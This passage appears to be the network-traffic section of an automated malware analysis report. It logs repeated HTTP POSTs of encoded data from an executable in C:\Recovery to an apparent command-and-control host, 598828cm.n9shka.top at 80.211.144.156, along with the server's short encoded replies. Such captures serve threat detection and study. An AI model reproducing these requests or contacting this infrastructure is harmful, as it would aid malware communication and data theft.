                                                    Data Ascii: VUYUTEZZ^^VQV^TRW^\_W]UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?&=2#'Z)="#?$8'%*[*)2*731X;<&F/%Z-=
                                                    Sep 14, 2024 12:54:00.125212908 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:00.253166914 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:59 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    56192.168.2.46282280.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:00.388796091 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:00.743928909 CEST1012OUTData Raw: 53 53 5c 59 54 45 5a 5a 5e 5e 56 51 56 53 54 59 57 57 5c 55 57 58 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SS\YTEZZ^^VQVSTYWW\UWXU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<<$"$ \*=#?83?%:(02)9]4#>;,&F/%Z-
                                                    Sep 14, 2024 12:54:01.063442945 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:01.194641113 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:00 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    57192.168.2.46282380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:01.251064062 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:01.603207111 CEST1748OUTData Raw: 53 55 59 5a 54 48 5a 53 5e 5e 56 51 56 52 54 59 57 56 5c 5f 57 5e 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SUYZTHZS^^VQVRTYWV\_W^U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%*<%'-!5*1"/8$(1?X*9%:=X4[,<&F/%Z-
                                                    Sep 14, 2024 12:54:01.930979967 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:02.101443052 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 15 3e 1a 3f 07 37 29 2c 18 28 2c 2e 13 3e 22 0b 01 3d 02 33 17 3e 1a 32 01 2a 2e 33 57 30 02 27 04 26 31 2a 01 30 37 28 09 36 01 2e 5a 0c 1d 20 05 23 0a 2e 58 31 2b 2a 5a 27 0f 00 1a 34 0c 20 01 25 15 21 5a 35 3c 39 01 3c 28 32 0b 29 1f 32 0d 3e 3d 0c 0a 3b 2d 0f 09 23 12 23 51 00 10 26 50 26 00 35 11 36 19 13 11 29 31 35 58 26 25 2e 50 30 3b 22 59 32 16 3e 07 30 23 27 5c 21 1c 2b 5b 27 12 38 05 22 33 2d 53 2b 04 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #>?7),(,.>"=3>2*.3W0'&1*07(6.Z #.X1+*Z'4 %!Z5<9<(2)2>=;-##Q&P&56)15X&%.P0;"Y2>0#'\!+['8"3-S+#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    58192.168.2.46282480.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:01.330517054 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:01.681251049 CEST1012OUTData Raw: 56 5e 5c 5c 51 45 5f 59 5e 5e 56 51 56 5c 54 5e 57 52 5c 5c 57 5e 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^\\QE_Y^^VQV\T^WR\\W^UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?'=!(=15<?$(#1?*3V%:5 #5\;<&F/%Z-
                                                    Sep 14, 2024 12:54:02.003211975 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:02.211747885 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:01 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    59192.168.2.46282580.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:02.466883898 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:02.821909904 CEST1012OUTData Raw: 53 57 59 5a 54 41 5a 5a 5e 5e 56 51 56 53 54 5b 57 5f 5c 5b 57 50 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SWYZTAZZ^^VQVST[W_\[WPUZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+?=0=>V"8*[="/4Y'(^1#[()1758<&F/%Z-
                                                    Sep 14, 2024 12:54:03.139471054 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:03.274552107 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    60192.168.2.46282680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:03.404781103 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:03.759346962 CEST1012OUTData Raw: 53 57 59 5c 54 44 5a 58 5e 5e 56 51 56 53 54 53 57 50 5c 5a 57 5d 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SWY\TDZX^^VQVSTSWP\ZW]UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+)3!>"]5X0#10(/&_ 068&F/%Z-
                                                    Sep 14, 2024 12:54:04.097634077 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:04.230067968 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:03 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    61192.168.2.46282780.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:04.358150959 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:04.712531090 CEST1012OUTData Raw: 53 53 59 5e 51 46 5a 5e 5e 5e 56 51 56 5c 54 5f 57 51 5c 5e 57 51 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SSY^QFZ^^^VQV\T_WQ\^WQUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%*,9'.!7])1#?;%(,&**)/Q&6##2;,&F/%Z-
                                                    Sep 14, 2024 12:54:05.025028944 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:05.156704903 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    62192.168.2.46282880.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:05.979633093 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:06.337461948 CEST1012OUTData Raw: 56 52 59 5e 51 44 5a 59 5e 5e 56 51 56 59 54 5d 57 53 5c 54 57 5d 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VRY^QDZY^^VQVYT]WS\TW]U\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\<'%#'X==%5[0?%)+[(9<19%\!#*,<&F/%Z-!
                                                    Sep 14, 2024 12:54:06.653438091 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:06.788264036 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    63192.168.2.46282980.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:06.936491013 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    64192.168.2.46283080.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:07.126223087 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1748
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:07.478183031 CEST1748OUTData Raw: 56 53 59 55 54 44 5f 5f 5e 5e 56 51 56 58 54 59 57 51 5c 5f 57 59 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VSYUTD__^^VQVXTYWQ\_WYUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+=_3-!!Q4)2Z!/$8Y24(97P&=\#9[;<&F/%Z-%
                                                    Sep 14, 2024 12:54:07.810712099 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:07.944142103 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 5d 3e 27 23 07 37 03 28 51 28 3f 22 12 29 32 08 15 2a 12 37 5f 2a 1a 3e 05 3d 03 05 18 33 2f 34 5c 33 21 32 05 27 27 33 56 23 2b 2e 5a 0c 1d 20 04 37 55 26 5c 25 2b 3e 59 27 08 22 5d 23 21 38 04 27 2b 21 5b 21 2c 3e 5d 28 01 2a 0f 2a 1f 2a 0e 29 3d 3a 41 2f 13 00 19 21 38 23 51 00 10 26 19 25 3d 25 13 21 19 3d 52 2a 22 25 13 31 35 26 13 30 38 31 05 32 06 21 58 30 23 23 5b 21 0c 2c 01 33 05 3f 15 23 20 32 08 3f 04 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #]>'#7(Q(?")2*7_*>=3/4\3!2''3V#+.Z 7U&\%+>Y'"]#!8'+![!,>](***)=:A/!8#Q&%=%!=R*"%15&0812!X0##[!,3?# 2?#R+(W>\M
                                                    Sep 14, 2024 12:54:08.273936033 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 5d 3e 27 23 07 37 03 28 51 28 3f 22 12 29 32 08 15 2a 12 37 5f 2a 1a 3e 05 3d 03 05 18 33 2f 34 5c 33 21 32 05 27 27 33 56 23 2b 2e 5a 0c 1d 20 04 37 55 26 5c 25 2b 3e 59 27 08 22 5d 23 21 38 04 27 2b 21 5b 21 2c 3e 5d 28 01 2a 0f 2a 1f 2a 0e 29 3d 3a 41 2f 13 00 19 21 38 23 51 00 10 26 19 25 3d 25 13 21 19 3d 52 2a 22 25 13 31 35 26 13 30 38 31 05 32 06 21 58 30 23 23 5b 21 0c 2c 01 33 05 3f 15 23 20 32 08 3f 04 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #]>'#7(Q(?")2*7_*>=3/4\3!2''3V#+.Z 7U&\%+>Y'"]#!8'+![!,>](***)=:A/!8#Q&%=%!=R*"%15&0812!X0##[!,3?# 2?#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    65192.168.2.46283180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:07.247996092 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:54:07.603065014 CEST1012OUTData Raw: 56 55 59 5a 54 44 5a 58 5e 5e 56 51 56 53 54 5f 57 54 5c 5e 57 58 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VUYZTDZX^^VQVST_WT\^WXUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(<%Y'V"\*.2!Y;'^ X%*/X?)<&] :/,&F/%Z-
                                                    Sep 14, 2024 12:54:07.945045948 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:08.273821115 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP
                                                    Sep 14, 2024 12:54:08.273988008 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    66192.168.2.46283280.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:08.404521942 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:08.759407997 CEST1012OUTData Raw: 56 53 5c 5e 54 47 5a 59 5e 5e 56 51 56 5a 54 5f 57 56 5c 5f 57 5c 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VS\^TGZY^^VQVZT_WV\_W\U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&*/"&-"V6$7(-*Z6?8]'8(_&\0(3&%^ #%Y.,&F/%Z--
                                                    Sep 14, 2024 12:54:09.071523905 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:09.205332041 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:08 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    67192.168.2.46283380.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:09.325078964 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:54:09.681257963 CEST1012OUTData Raw: 56 5e 59 5f 54 48 5a 5c 5e 5e 56 51 56 5f 54 5a 57 5f 5c 55 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^Y_THZ\^^VQV_TZW_\UWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z(Z!$"R"$])="6?$\0,_1?) %\ #)8&F/%Z-9
                                                    Sep 14, 2024 12:54:09.915621996 CEST1012OUTData Raw: 56 5e 59 5f 54 48 5a 5c 5e 5e 56 51 56 5f 54 5a 57 5f 5c 55 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^Y_THZ\^^VQV_TZW_\UWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z(Z!$"R"$])="6?$\0,_1?) %\ #)8&F/%Z-9
                                                    Sep 14, 2024 12:54:10.228055954 CEST1012OUTData Raw: 56 5e 59 5f 54 48 5a 5c 5e 5e 56 51 56 5f 54 5a 57 5f 5c 55 57 50 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: V^Y_THZ\^^VQV_TZW_\UWPU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Z(Z!$"R"$])="6?$\0,_1?) %\ #)8&F/%Z-9
                                                    Sep 14, 2024 12:54:10.706451893 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:10.706636906 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:10.708391905 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:54:10.988092899 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:54:10 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    68192.168.2.46283480.211.144.15680
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:54:11.125777006 CEST290OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
